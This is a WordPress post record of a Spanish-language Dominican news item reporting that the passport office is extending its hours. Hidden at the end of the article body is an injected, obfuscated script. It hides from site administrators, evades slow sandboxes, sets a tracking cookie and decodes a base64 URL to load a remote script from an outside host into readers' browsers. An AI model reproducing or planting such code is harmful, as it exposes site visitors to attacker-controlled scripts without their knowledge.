{"id":13504,"date":"2023-01-20T12:36:59","date_gmt":"2023-01-20T16:36:59","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13504"},"modified":"2023-01-20T12:36:59","modified_gmt":"2023-01-20T16:36:59","slug":"direccion-de-pasaportes-ampliara-horario-de-atencion","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13504","title":{"rendered":"Direcci\u00f3n de Pasaportes ampliar\u00e1 horario de atenci\u00f3n"},"content":{"rendered":"<p>SANTO DOMINGO. La Direcci\u00f3n General de Pasaportes anunci\u00f3 este viernes que, a partir del lunes 23 de enero, ampliar\u00e1 el horario de atenci\u00f3n a los usuarios, desde las 8:00 de la ma\u00f1ana hasta las 8:00 de la noche, tanto en la sede central como todas sus oficinas provinciales.<\/p>\n<p>La medida busca atender la demanda de los ciudadanos que busquen la emisi\u00f3n o renovaci\u00f3n de su libreta de viaje y brindar un servicio oportuno.<\/p>\n<p>La instituci\u00f3n record\u00f3 que cuenta con libretas suficientes para satisfacer las emisiones por primera vez, deterioro y agotamiento, mientras que las renovaciones de libretas se estar\u00e1n atendiendo con el nuevo procedimiento temporal de sellado.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>SANTO DOMINGO. La Direcci\u00f3n General de Pasaportes anunci\u00f3 este viernes que, a partir del lunes 23 de enero, ampliar\u00e1 el horario de atenci\u00f3n a los usuarios, desde las 8:00 de la ma\u00f1ana hasta las 8:00 de la noche, tanto en la sede central como todas sus oficinas provinciales. La medida busca atender la demanda de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13506,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13504","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13504","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13504"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13504\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13506"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13504"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13504"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13504"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}